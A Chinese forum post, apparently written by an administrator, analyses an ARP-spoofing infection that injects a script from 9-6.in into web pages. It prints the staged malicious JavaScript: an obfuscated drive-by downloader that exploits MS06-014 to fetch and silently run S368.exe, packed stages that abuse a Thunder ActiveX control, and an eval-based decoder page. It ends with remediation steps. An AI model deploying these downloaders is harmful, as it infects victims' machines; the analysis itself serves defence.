解析arp病毒背后利用的Javascript技术附解密方法

本文的目的是探讨JS相关技术,并不是以杀毒为主要目的,杀毒只是为讲解一些JS做铺垫的,呵呵,文章有点长,倒杯咖啡或者清茶慢慢看,学习切勿急躁!

最近公司的网络中了这两天闹的很欢的ARP病毒,导致大家都无法上网,给工作带来了很大的不方便,在这里写下杀毒的过程,希望对大家能有帮助!

现象:打开部分网页显示为乱码,看起来像随机行为,但又不完全随机,因为它一直盯着msn.com,呵呵,可能和微软有仇吧。继续查看源代码,发现页面头部被插入了一个js文件链接----<script src=http://9-6.in/n.js></script>;(注意:这行脚本并不在msn.com的真实页面里,而是局域网里那台做ARP欺骗的机器在HTTP响应经过它时注入进去的——这也是后面"某台机器的MAC地址和网关相同"的原因;所谓"乱码"很可能就是响应被篡改之后内容编码/长度对不上造成的副作用。)

来源:经过一番网络搜索,发现这个域名是印度域名,而IP地址却是美国的,而且域名的注册日期是7月25日,看来一切都是预谋好了的,还是不管这个了,先解决问题吧;

分析:
1、先把(http://9-6.in/n.js)这个JS文件下载下来,代码如下: 

    // Stage 1 (n.js), injected into pages in transit by the ARP-spoofing host.
    // NOTE(review): the forum appears to have turned every backslash into '/', so
    // `/"` below was `\"` and `<//script>` was `<\/script>`; not runnable as printed.
    // Suppress IE script-error dialogs so a failing exploit stays invisible to the victim.
    document.writeln("<script>window.onerror=function(){return true;}<//script>");
    // Load stage 2 (NewJs2.js): the hex-escaped downloader analysed below.
    document.writeln("<script src=/"http:////9-6.in//S368//NewJs2.js/"><//script>");
    document.writeln("<script>");
    // StartRun(): once-per-24h gate keyed on a marker cookie named "Cookie1".
    document.writeln("function StartRun(){");
    document.writeln("var Then = new Date() ");
    // Expiry = now + 24h, so the hidden iframe is injected at most once a day per browser.
    document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
    document.writeln("var cookieString = new String(document.cookie)");
    document.writeln("var cookieHeader = /"Cookie1=/" ");
    document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
    // Marker present: do nothing (empty branch).
    document.writeln("if (beginPosition != -1){ ");
    document.writeln("} else ");
    // Marker absent: set it, then load stage 3 (T368.htm) in a 0x0 invisible iframe.
    document.writeln("{ document.cookie = /"Cookie1=POPWINDOS;expires=/"+ Then.toGMTString() ");
    document.writeln("document.write(/'<iframe width=0 height=0 src=/"http:////9-6.IN//s368//T368.htm/"><//iframe>/');");
    document.writeln("}");
    document.writeln("}");
    document.writeln("StartRun();");
    document.writeln("<//script>")
其中第一句window.onerror=function(){return true;}就先把JS错误屏蔽掉(这样后面漏洞利用失败时也不会弹出脚本错误提示),真够狠的,呵呵,不这样怎么隐藏自己呢,哈哈!然后还引入了第二个JS文件http://9-6.in/S368/NewJs2.js(真正的下载者,下面分析),先继续往下看,找到StartRun();运行一个函数,函数的作用是:检查有没有名为Cookie1的cookie,没有的话就写一个(Cookie1=POPWINDOS,保存一天),同时用一个0x0的隐藏iframe加载http://9-6.IN/s368/T368.htm;已经有这个cookie的话就什么都不做。也就是说这个cookie只是个标记,保证每个浏览器24小时内只加载一次隐藏页面,减少重复动作被人察觉的机会。另外注意贴出来的代码里/"其实是\"(论坛把反斜杠显示成了正斜杠),其余就没有什么特别的了;
2、下载(http://9-6.in/S368/NewJs2.js)这个文件,代码如下:

// Stage 2 (NewJs2.js). Every character is a \xNN string escape (shown as /xNN because the
// forum replaced backslashes); the strings inside the decoded script are escaped a second
// time (\\xNN, shown as ///x), hence the two decoding passes described in the text.
// Decoded, it builds a <script> that:
//   - suppresses window.onerror,
//   - creates an <object> with classid BD96C556-65A3-11D0-983A-00C04FC29E36
//     (RDS.DataSpace, the MS06-014 / CVE-2006-0003 MDAC control),
//   - uses its CreateObject() to instantiate Microsoft.XMLHTTP, ADODB.Stream,
//     Scripting.FileSystemObject and Shell.Application,
//   - GETs DZ = http://9-6.in/S368/S368.exe and writes responseBody to
//     <GetSpecialFolder(0)=Windows dir>\~Temp<random>.tmp (name built by GnMs()),
//   - runs it as "<windir>\system32\cmd.exe /c <file>" via ShellExecute with the
//     window-style argument 0 (hidden), all inside try/catch.
// The many repeated `Nosksla=''` assignments do nothing; presumably filler to break
// signature matching. NOTE(review): not runnable as printed ('/' stands for '\').
StrInfo =  "/x3c/x73/x63/x72/x69/x70/x74/x3e/x77/x69/x6e/x64/x6f/x77/x2e/x6f/x6e/x65/x72/x72/x6f/x72/x3d/x66/x75/x6e/x63/x74/x69/x6f/x6e/x28/x29/x7b/x72/x65/x74/x75/x72/x6e /x74/x72/x75/x65/x3b/x7d/x3c/x2f/x73/x63/x72/x69/x70/x74/x3e" +"/n"+
  "/x3c/x73/x63/x72/x69/x70/x74/x3e" +"/n"+
  " /x44/x5a/x3d/'///x78/x36/x38///x78/x37/x34///x78/x37/x34///x78/x37/x30///x78/x33/x41///x78/x32/x46///x78/x32/x46///x78/x33/x39///x78/x32/x44///x78/x33/x36///x78/x32/x45///x78/x36/x39///x78/x36/x45///x78/x32/x46///x78/x35/x33///x78/x33/x33///x78/x33/x36///x78/x33/x38///x78/x32/x46///x78/x35/x33///x78/x33/x33///x78/x33/x36///x78/x33/x38///x78/x32/x45///x78/x36/x35///x78/x37/x38///x78/x36/x35/'/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  "/x66/x75/x6e/x63/x74/x69/x6f/x6e /x47/x6e/x4d/x73/x28/x6e/x29 " +"/n"+
  "/x7b " +"/n"+
  " /x76/x61/x72 /x6e/x75/x6d/x62/x65/x72/x4d/x73 /x3d /x4d/x61/x74/x68/x2e/x72/x61/x6e/x64/x6f/x6d/x28/x29/x2a/x6e/x3b" +"/n"+
  " /x72/x65/x74/x75/x72/x6e /'///x78/x37/x45///x78/x35/x34///x78/x36/x35///x78/x36/x44///x78/x37/x30/'/x2b/x4d/x61/x74/x68/x2e/x72/x6f/x75/x6e/x64/x28/x6e/x75/x6d/x62/x65/x72/x4d/x73/x29/x2b/'///x78/x32/x45///x78/x37/x34///x78/x36/x44///x78/x37/x30/'/x3b" +"/n"+
  "/x7d " +"/n"+
  " /x74/x72/x79 " +"/n"+
  "/x7b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  " /x76/x61/x72 /x42/x66/x3d/x64/x6f/x63/x75/x6d/x65/x6e/x74/x2e/x63/x72/x65/x61/x74/x65/x45/x6c/x65/x6d/x65/x6e/x74/x28/"///x78/x36/x46///x78/x36/x32///x78/x36/x41///x78/x36/x35///x78/x36/x33///x78/x37/x34/"/x29/x3b" +"/n"+
  " /x42/x66/x2e/x73/x65/x74/x41/x74/x74/x72/x69/x62/x75/x74/x65/x28/"///x78/x36/x33///x78/x36/x43///x78/x36/x31///x78/x37/x33///x78/x37/x33///x78/x36/x39///x78/x36/x34/"/x2c/"///x78/x36/x33///x78/x36/x43///x78/x37/x33///x78/x36/x39///x78/x36/x34///x78/x33/x41///x78/x34/x32///x78/x34/x34///x78/x33/x39///x78/x33/x36///x78/x34/x33///x78/x33/x35///x78/x33/x35///x78/x33/x36///x78/x32/x44///x78/x33/x36///x78/x33/x35///x78/x34/x31///x78/x33/x33///x78/x32/x44///x78/x33/x31///x78/x33/x31///x78/x34/x34///x78/x33/x30///x78/x32/x44///x78/x33/x39///x78/x33/x38///x78/x33/x33///x78/x34/x31///x78/x32/x44///x78/x33/x30///x78/x33/x30///x78/x34/x33///x78/x33/x30///x78/x33/x34///x78/x34/x36///x78/x34/x33///x78/x33/x32///x78/x33/x39///x78/x34/x35///x78/x33/x33///x78/x33/x36/"/x29/x3b" +"/n"+
  " /x76/x61/x72 /x4b/x78/x3d/x42/x66/x2e/x43/x72/x65/x61/x74/x65/x4f/x62/x6a/x65/x63/x74/x28/"///x78/x34/x44///x78/x36/x39///x78/x36/x33///x78/x37/x32///x78/x36/x46///x78/x37/x33///x78/x36/x46///x78/x36/x36///x78/x37/x34///x78/x32/x45///x78/x35/x38/"/x2b/"///x78/x34/x44///x78/x34/x43///x78/x34/x38///x78/x35/x34///x78/x35/x34///x78/x35/x30/"/x2c/"/"/x29/x3b" +"/n"+
  " /x76/x61/x72 /x41/x53/x3d/x42/x66/x2e/x43/x72/x65/x61/x74/x65/x4f/x62/x6a/x65/x63/x74/x28/"///x78/x34/x31///x78/x36/x34///x78/x36/x46///x78/x36/x34///x78/x36/x32///x78/x32/x45///x78/x35/x33///x78/x37/x34///x78/x37/x32///x78/x36/x35///x78/x36/x31///x78/x36/x44/"/x2c/"/"/x29/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  " /x41/x53/x2e/x74/x79/x70/x65/x3d/x31/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  " /x4b/x78/x2e/x6f/x70/x65/x6e/x28/"///x78/x34/x37///x78/x34/x35///x78/x35/x34/"/x2c /x44/x5a/x2c/x30/x29/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  " /x4b/x78/x2e/x73/x65/x6e/x64/x28/x29/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  " /x4e/x73/x31/x3d/x47/x6e/x4d/x73/x28/x39/x39/x39/x39/x29/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  " /x76/x61/x72 /x63/x46/x3d/x42/x66/x2e/x43/x72/x65/x61/x74/x65/x4f/x62/x6a/x65/x63/x74/x28/"///x78/x35/x33///x78/x36/x33///x78/x37/x32///x78/x36/x39///x78/x37/x30///x78/x37/x34///x78/x36/x39///x78/x36/x45///x78/x36/x37///x78/x32/x45///x78/x34/x36///x78/x36/x39///x78/x36/x43///x78/x36/x35///x78/x35/x33///x78/x37/x39///x78/x37/x33///x78/x37/x34///x78/x36/x35///x78/x36/x44///x78/x34/x46///x78/x36/x32///x78/x36/x41///x78/x36/x35///x78/x36/x33///x78/x37/x34/"/x2c/"/"/x29/x3b" +"/n"+
  " /x76/x61/x72 /x4e/x73/x54/x6d/x70/x3d/x63/x46/x2e/x47/x65/x74/x53/x70/x65/x63/x69/x61/x6c/x46/x6f/x6c/x64/x65/x72/x28/x30/x29/x3b /x4e/x73/x31/x3d /x63/x46/x2e/x42/x75/x69/x6c/x64/x50/x61/x74/x68/x28/x4e/x73/x54/x6d/x70/x2c/x4e/x73/x31/x29/x3b /x41/x53/x2e/x4f/x70/x65/x6e/x28/x29/x3b/x41/x53/x2e/x57/x72/x69/x74/x65/x28/x4b/x78/x2e/x72/x65/x73/x70/x6f/x6e/x73/x65/x42/x6f/x64/x79/x29/x3b" +"/n"+
  " /x41/x53/x2e/x53/x61/x76/x65/x54/x6f/x46/x69/x6c/x65/x28/x4e/x73/x31/x2c/x32/x29/x3b /x41/x53/x2e/x43/x6c/x6f/x73/x65/x28/x29/x3b /x76/x61/x72 /x71/x3d/x42/x66/x2e/x43/x72/x65/x61/x74/x65/x4f/x62/x6a/x65/x63/x74/x28/"///x78/x35/x33///x78/x36/x38///x78/x36/x35///x78/x36/x43///x78/x36/x43///x78/x32/x45///x78/x34/x31///x78/x37/x30///x78/x37/x30///x78/x36/x43///x78/x36/x39///x78/x36/x33///x78/x36/x31///x78/x37/x34///x78/x36/x39///x78/x36/x46///x78/x36/x45/"/x2c/"/"/x29/x3b" +"/n"+
  " /x6f/x6b/x31/x3d/x63/x46/x2e/x42/x75/x69/x6c/x64/x50/x61/x74/x68/x28/x4e/x73/x54/x6d/x70/x2b/'///x78/x35/x43///x78/x35/x43///x78/x37/x33///x78/x37/x39///x78/x37/x33///x78/x37/x34///x78/x36/x35///x78/x36/x44///x78/x33/x33///x78/x33/x32/'/x2c/'///x78/x36/x33///x78/x36/x44///x78/x36/x34///x78/x32/x45///x78/x36/x35///x78/x37/x38///x78/x36/x35/'/x29/x3b" +"/n"+
  " /x71/x2e/x53/x48/x65/x4c/x4c/x45/x78/x65/x63/x75/x74/x65/x28/x6f/x6b/x31/x2c/'///x78/x32/x30///x78/x32/x46///x78/x36/x33 /'/x2b/x4e/x73/x31/x2c/"/"/x2c/"///x78/x36/x46///x78/x37/x30///x78/x36/x35///x78/x36/x45/"/x2c/x30/x29/x3b" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  "/x7d " +"/n"+
  " /x63/x61/x74/x63/x68/x28/x4d/x73/x49/x29 /x7b /x4d/x73/x49/x3d/x31/x3b /x7d" +"/n"+
  " /x4e/x6f/x73/x6b/x73/x6c/x61/x3d/'/'/x3b" +"/n"+
  "/x3c/x2f/x73/x63/x72/x69/x70/x74/x3e"
// document.write(StrInfo), with "document" and "write" hex-escaped so the call
// does not appear in plain text.
window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65"](StrInfo);
这个代码有点长哦,而且有保护措施,全部转换为十六进制,不过不要害怕,我们有办法解决。先说明一点:上面贴出来的/x其实是JS字符串里的十六进制转义\x(论坛把反斜杠都显示成了正斜杠,同理/"是\"、/'是\'、///x是\\x),所以解码的思路就是把\xNN还原成对应的字符。首先得确保你已经安装了UE,然后打开UE,把代码粘贴进去(废话,呵呵),把\x(贴出来显示为/x)替换为%,然后用html代码转换功能(其实就是URL解码)解码,就可以得到第一次解码的代码。第一次???呵呵,这个代码的作者很变态的,做了两次编码——第一层解出来之后,脚本里的字符串又是一层\xNN(原来的\\x),所以得重复刚才的步骤再解一次,然后你就可以看到最终的“原始”代码了。整个过程都是纯文本替换,不要为了“看结果”而去运行这段脚本;分析也尽量在隔离的虚拟机里做;
具体的代码我就不帖出来了,有一定的危害性,相信大家看了上面的步骤都能自己找到代码,这里之说一下比较核心的代码吧;

//核心代码
..............
  " var Bf=document.createElement(/"/o/b/j/e/c/t/");" +"/n"+
  " Bf.setAttribute(/"/c/l/a/s/s/i/d/",/"/c/l/s/i/d/:/B/D/9/6/C/5/5/6/-/6/5/A/3/-/1/1/D/0/-/9/8/3/A/-/0/0/C/0/4/F/C/2/9/E/3/6/");" +"/n"+
  " var Kx=Bf.CreateObject(/"/M/i/c/r/o/s/o/f/t/./X/"+/"/M/L/H/T/T/P/",/"/");" +"/n"+
  " var AS=Bf.CreateObject(/"/A/d/o/d/b/./S/t/r/e/a/m/",/"/");" +"/n"+
.............
  " var cF=Bf.CreateObject(/"/S/c/r/i/p/t/i/n/g/./F/i/l/e/S/y/s/t/e/m/O/b/j/e/c/t/",/"/");" +"/n"+
  " var NsTmp=cF.GetSpecialFolder(0); Ns1= cF.BuildPath(NsTmp,Ns1); AS.Open();AS.Write(Kx.responseBody);" +"/n"+
  " AS.SaveToFile(Ns1,2); AS.Close(); var q=Bf.CreateObject(/"/S/h/e/l/l/./A/p/p/l/i/c/a/t/i/o/n/",/"/");" +"/n"+
  " ok1=cF.BuildPath(NsTmp+/'/////s/y/s/t/e/m/3/2/',/'/c/m/d/./e/x/e/');" +"/n"+
  " q.SHeLLExecute(ok1,/'/ ///c /'+Ns1,/"/",/"/o/p/e/n/",0);" +"/n"+
..............
上面的就是最为核心的代码:它利用的是MS06-014(CVE-2006-0003,MDAC的RDS.DataSpace控件)漏洞——setAttribute里那个classid BD96C556-65A3-11D0-983A-00C04FC29E36就是RDS.DataSpace,通过它的CreateObject方法,网页脚本可以创建出IE本来不允许页面直接创建的Microsoft.XMLHTTP、ADODB.Stream、Scripting.FileSystemObject和Shell.Application对象。之后的流程是:用XMLHTTP(就是所谓的JS异步对象)GET下载病毒文件(DZ解码后是http://9-6.in/S368/S368.exe),用ADODB.Stream把responseBody写到Windows目录(GetSpecialFolder(0))下一个叫~Temp随机数.tmp的文件里(GnMs函数生成文件名),最后用Shell.Application的ShellExecute以隐藏窗口(最后一个参数0)执行 %WINDIR%\system32\cmd.exe /c 那个文件,这样就达到它的目的啦!所以打了MS06-014补丁的机器这一路是走不通的;排查机器时也可以看看Windows目录下有没有~Temp*.tmp这样的文件,那就是落地的病毒样本。
3、打开http://9-6.IN/s368/T368.htm查看源代码,又发现一段怪异的JS文件,如下:

<script>
    // Stage 3 (T368.htm): output of Dean Edwards' /packer/ (signature function(p,a,c,k,e,d)),
    // evaluated directly. Unpacked with the decoder below it yields a document.write of
    // <script src="S368.jpg"> -- the next stage, a script served under an image name.
    // NOTE(review): backslashes are again shown as '/', so e.g. //b here was \b and the
    // listing is not runnable as printed.
    eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return'//w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('//b'+e(c)+'//b','g'),k[c]);return p}('x("//0//6//9//5//i//h//j//j//4//f//8//3//2//0//7//1//i//8//2//3//h//g//4//w//v//u//t//b//s//7//r//g//4//e//f//q//8//3//2//0//7//1//e//4//d//c//d//c//p//5//3//o//n//a//6//1//b//m//2//0//1//a//l//0//6//9//5//k")',34,34,'151|164|162|143|42|157|156|160|163|146|145|56|12|15|76|74|134|75|40|11|51|50|167|155|165|144|57|147|152|70|66|63|123|eval'.split('|'),0,{}))
</script>



解析arp病毒背后利用的Javascript技术


可以看出这段代码也是经过加密的了,特征为function(p,a,c,k,e,d),这是Dean Edwards的/packer/混淆器的输出(把标识符替换成base62索引,再用一个自解包的eval函数在运行时还原),网上有很多例子,我就不细说了。附上解密代码,但要特别注意:下面页面里的“解码”和“执行”按钮都是用eval处理文本框内容的,也就是说会在你的浏览器里真的运行这段(攻击者提供的)脚本,所以只能在隔离的、打好补丁的虚拟机里使用,千万不要在日常办公机上点“执行”:

//以下代码为网上搜索所得,版权归原作者所有
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>无标题文档</title>
</head>
<body>
<script>
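// Packer radix shared by encode()/num(): identifiers are numbered in base 62
// (0-9, a-z, A-Z). Declared with var instead of as an implicit global.
var a = 62;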
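function encode() {
  // Pack the #code textarea with Dean Edwards' /packer/ scheme: collapse newlines,
  // escape single quotes, replace every distinct word (sorted) with its base-62 index
  // from num(), and wrap the result in the self-unpacking
  // eval(function(p,a,c,k,e,d){...}) stub. Uses the global radix `a`.
  // Fixes vs. the listing as printed: restored the closing braces the forum dropped
  // and the backslashes it turned into '/', and guarded match() returning null.
  var code = document.getElementById('code').value;
  code = code.replace(/[\r\n]+/g, '');
  code = code.replace(/'/g, "\\'");
  // match() returns null when the text holds no word at all; treat that as an empty list.
  var tmp = code.match(/\b(\w+)\b/g) || [];
  tmp.sort();
  var dict = [];
  var i, t = '';
  // Sorted input, so equal words are adjacent and one comparison dedups them.
  for (i = 0; i < tmp.length; i++) {
    if (tmp[i] != t) dict.push(t = tmp[i]);
  }
  var len = dict.length;
  var ch;
  for (i = 0; i < len; i++) {
    ch = num(i);
    code = code.replace(new RegExp('\\b' + dict[i] + '\\b', 'g'), ch);
    // A word that encodes to itself needs no dictionary entry (the unpacker falls back to e(c)).
    if (ch == dict[i]) dict[i] = '';
  }
  document.getElementById('code').value = "eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c]);return p}("
    + "'" + code + "'," + a + "," + len + ",'" + dict.join('|') + "'.split('|'),0,{}))";
}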

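function num(c) {
  // Encode a non-negative integer in the packer's base-`a` alphabet: 0-9 and a-z via
  // toString(36) for digits below 36, 'A'-'Z' (char code + 29) for 36..61; larger
  // values recurse on the quotient. Mirrors e() inside the unpacking stub.
  // Only meaningful for a <= 62 (the +29 mapping stops at 'Z'). Restores the closing
  // brace missing from the listing; parseInt keeps the original truncation semantics.
  var prefix = c < a ? '' : num(parseInt(c / a, 10));
  var digit = c % a;
  return prefix + (digit > 35 ? String.fromCharCode(digit + 29) : digit.toString(36));
}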

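function run() {
  // Execute the #code textarea contents as JavaScript in THIS page via eval.
  // WARNING: with a malware sample in the textarea this runs the malware (e.g. the
  // MS06-014 downloader analysed above). Use only inside an isolated, offline VM.
  // Restores the closing brace missing from the listing.
  eval(document.getElementById('code').value);
}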
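function decode() {
  // Unpack an eval(function(p,a,c,k,e,d){...}(...)) blob: strip the leading `eval` so
  // evaluating the remainder only RUNS THE UNPACKER and returns the decoded source as a
  // string instead of executing it.
  // NOTE: the unpacker function is still attacker-supplied code and does get executed;
  // treat this tool as "runs the sample" and use it only in an isolated VM.
  var code = document.getElementById('code').value.replace(/^\s+/, '');
  // Refuse anything that is not an eval(...) wrapper. The original bare `eval(code)`
  // would silently execute any other text -- including a packed sample pasted with
  // leading whitespace, where /^eval/ did not match and the malware ran instead.
  if (!/^eval\s*\(/.test(code)) {
    throw new Error('decode(): input does not start with eval( -- refusing to execute it');
  }
  code = code.replace(/^eval/, '');
  document.getElementById('code').value = eval(code);
}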
</script> 
<textarea id=code cols=80 rows=20> 

</textarea><br /> 
<input type=button onclick=encode() value=编码/> 
<input type=button onclick=run() value=执行/> 
<input type=button onclick=decode() value=解码/>
</body>
</html>
经过解密后代码为:

// Result of unpacking stage 3 (T368.htm): loads a fourth stage from "S368.jpg".
// Despite the .jpg name the file is JavaScript (its contents follow); presumably the
// image extension is meant to pass casual inspection. '/"' stands for '\"' (forum mangling).
info =        "<script src=/"S368.jpg/"></script>"
document.write(info)
继续打开这个表面象图片的链接,呵呵,当然不会是MM图片了,查看源代码,找到如下代码:

// Stage 4 (served as S368.jpg): Dean Edwards' /packer/ again (here function(p,a,c,k,e,r)),
// with the unpacked script's strings once more written as \xNN escapes. The dictionary at
// the end still contains plain `var`, `return`, `function`, `try`, `new`, `ActiveXObject`,
// `catch`, `if`, so the decoded script instantiates an ActiveX control inside try/catch;
// the author identifies it as the Web Thunder (迅雷) download control, used as a second,
// independent way to fetch and run the payload.
// NOTE(review): the listing wraps mid-token (`x2` / `c|x77`) and shows '/' for '\'; repair
// both before feeding it to the decoder, and only ever decode it in an isolated VM.
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'//w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('//b'+e(c)+'//b','g'),k[c]);return p}('E n=1c;12 13(){}12 14(){1d{n=1e 1f("//K//l//r//8//i//3//6//j//3//6//o//3//6//9//C//3//s//K//l//r//8//i//3//6//9//x")}1g(e){Q}E a=n["//15//3//4//p//d//8//m//7//k"]("//w//8//4//7//o//7//6//r//f","//R//7//q//3//v//5//4//l","");1h(a["//7//8//i//3//y//L//m"]("//z//f//l//4//5//9//3//y//3")!=-1){Q}E b=n["//15//3//4//j//3//6//o//3//6//v//5//4//l"]();b=b["//f//r//s//f//4//6"](0,2);b+="//////v//6//d//k//6//5//J//x//////K//l//r//8//i//3//J//x//////1i//3//s//K//l//r//8//i//3//6//////A//6//d//m//7//q//3//f//////r//f//3//6//h//d//8//m//7//k//9//7//8//7";n["//j//3//4//p//5//q//q//s//5//h//1j//F//8//4//6//D"](1k,13);E c=n["//w//i//i//p//5//4//3//k//d//6//D"]("//7");E c=n["//w//i//i//p//5//4//3//k//d//6//D"]("//5");E c=n["//w//i//i//p//5//4//3//k//d//6//D"]("//s");E c=n["//w//i//i//p//5//4//3//k//d//6//D"]("//h");E c=n["//w//i//i//p//5//4//3//k//d//6//D"]("//i");n["//j//3//4//p//d//8//m//7//k"]("//j//5//o//3//v//5//4//l","//7","//S//f//h//6//7//A//4//16//o//5//6 //f//G//8//3//C //w//h//4//7//o//3//N//L//s//T//3//h//4//t//"//C//f//h//6//7//A//4//9//f//l//3//q//q//"//u//g//o//5//6 //d//G//8//3//C //w//h//4//7//o//3//N//L//s//T//3//h//4//t//"//f//l//3//q//q//9//5//A//A//q//7//h//5//4//7//d//8//"//u//g//o//5//6 //5//B//s//B//h//B//i//B//3//B//m//B//k//g");n["//j//3//4//p//d//8//m//7//k"]("//j//5//o//3//v//5//4//l","//5","//H//g//f//9//U//r//8//t//"//p//V//////////v//6//d//k//6//5//J//x//////////I//8//4//3//6//8//J//x//////////I//F//N//v//17//L//U//F//9//F//N//F //l//4//4//A//1l//O//O//h//1m//x//W//7//18//O//j//X//19//1a//O//i//1n//C//18//Y//Y//W//l//4//Y//1o//"//B//H//B//H//u//g//f//9//U//r//8//t//"//h//z//i//9//3//y//3 //Z//h //4//6//3//3 //h//V//////// 
//Z//m//"//B//H//B//x//u//g");n["//j//3//4//p//d//8//m//7//k"]("//j//5//o//3//v//5//4//l","//s","//f//9//j//A//3//h//7//5//q//R//d//q//i//3//6//f//t//"//1p//D//1q//d//h//r//z//3//8//4//f//"//u//g//s//G//s//9//f//r//s//f//4//6//7//8//k//t//H//B//s//9//q//5//f//4//I//8//i//3//y//L//m//t//"//////////"//u//u//g//s//P//G//"//////////q//d//h//5//q//f//J//x//////////K//3//z//A//d//6//J//x//////////p//d//8//4//3//8//4//9//I//F//1r//////////"//g");n["//j//3//4//p//d//8//m//7//k"]("//j//5//o//3//v//5//4//l","//h","//d//9//1s//5//z//3//j//A//5//h//3//t//s//u//g//m//d//6//t//5//G//H//g//5//S//h//9//I//4//3//z//f//t//u//9//p//d//r//8//4//g//5//P//P//u//10 //o//5//6 //m//G//h//9//I//4//3//z//f//t//u//9//I//4//3//z//t//5//u//9//v//5//4//l//g//m//P//G//"//////////j//X//19//1a//1b//1t//x//1u//W//3//y//3//"//g");n["//j//3//4//p//d//8//m//7//k"]("//j//5//o//3//v//5//4//l","//i","//H//g//4//6//D//10//f//9//F//y//3//h//t//m//u//g//11//h//5//4//h//l//t//3//u//10//11//g//11//C//7//8//i//d//C//9//h//q//d//f//3//t//u//g//S//Z//f//h//6//7//A//4//16");n["//j//3//4//p//d//8//m//7//k"]("//w//8//4//7//o//7//6//r//f","//v//6//d//4//3//h//4","//x");n["//j//3//4//p//d//8//m//7//k"]("//w//8//4//7//o//7//6//r//f","//R//7//q//3//v//5//4//l","//h//V//////C//7//8//i//d//C//f//////f//D//f//4//3//z//X//1b//////z//f//l//4//5//9//3//y//3");n["//j//3//4//p//d//8//m//7//k"]("//w//8//4//7//o//7//6//r//f","//v//5//6//5//z//3//4//3//6",b);n["//j//3//4//p//d//8//m//7//k"]("//w//8//4//7//o//7//6//r//f","//F//y//4//17//7//f//4","//9//6//5//6//g//9//M//7//A//g//9//3//y//3//g//9//i//d//h//g//9//h//d//z//g//9//s//7//8//g//9//k//M//g//9//M//g//9//4//5//6//g//9//5//6//T//g//9//q//M//l//g//9//f//7//4//g//9//l//1v//y//g//9//4//k//M//g//9//i//q//q//g//9//d//h//y//g//9//o//s//y//g");n["//j//3//4//p//d//8//m//7//k"]("//w//8//4//7//o//7//6//r//f","//1w//f//3//6//j//3//4","//x");Q}14();',62,95,'|||x65|x74|x61|x72|x69|x6e|x2e||||x6f||x73|x3b|x63|x64|x53|x67|x68|x66|odks63ls|x76|x43|x6c|x75|x62|x28|x29|x50|x41|x31|x78|x6d|x70|x2
c|x77|x79|var|x45|x3d|x30|x49|x7e|x54|x4f|x7a|x58|x2F|x2b|return|x46|x3c|x6a|x52|x3a|x2E|x33|x6D|x2f|x7b|x7d|function|assort_panel_enabled|pslcdkc|x47|x3e|x4c|x6E|x36|x38|x32|null|try|new|ActiveXObject|catch|if|x57|x6b|106|x3A|x6B|x6F|x6C|x4d|x44|x35|x4e|x5B|x5D|x71|x55'.split('|'),0,{}))
又是好长的代码,又发现了function(p,a,c,k,e,r),继续解码,代码很长,请大家自己解码查看吧。这里用的还是上面的手法:先用packer加密,解出来的脚本里的字符串又全部转成了十六进制转义,尽最大努力混淆我们的视线,来达到不可告人的目的。不过从最后那段词典里还能直接看到var、function、try、new、ActiveXObject、catch、if这些关键字,说明解开后的脚本是在try/catch里创建ActiveX对象——这段代码的主要作用是用另外一种方法下载病毒并运行,思想真的很先进,居然是去调用Web迅雷(迅雷的ActiveX下载控件)来下载病毒,然后去运行。作者真的是煞费苦心啊,应用了两种方法下载病毒,也就是说MS06-014和迅雷控件两个条件只要满足一个就会中招,所以光打MDAC补丁还不够,迅雷控件也要升级或者干脆设置kill-bit禁用掉,“小样,就不信毒不倒你!”,呵呵
杀毒:说了半天只是分析了一下ARP病毒发作的时候在干什么,下面就说下关于杀毒的问题,其实现在网上有很多这方面的相关教程,我就简单总结一下我的杀毒过程吧;
1、中了arp病毒必须要先找到中毒的机器
2、给这个机器断网、杀毒
3、恢复局域网
其中第一步最关键了,如何才能找到呢?
在局域网随便一台客户机上打开网上邻居,查看工作组计算机,等列表刷新出来后,迅速点击开始-->运行-->cmd-->arp -a回车(机器比较多时多执行几次arp -a),然后仔细查看:ARP表里网关IP对应的MAC地址会变成另一台机器的MAC,也就是会有两个IP(网关和某台客户机)对应同一个MAC地址,那台客户机就是毒源!最好先从路由器/交换机上确认网关的真实MAC,再拿来和arp -a的结果比对,避免误判。
到这台机器的跟前(呵呵,废话真多),剩下的工作相信大家都有很多经验了吧,杀毒!装杀毒软件或者进安全模式更甚者重装机器,总之把病毒干掉就行了;
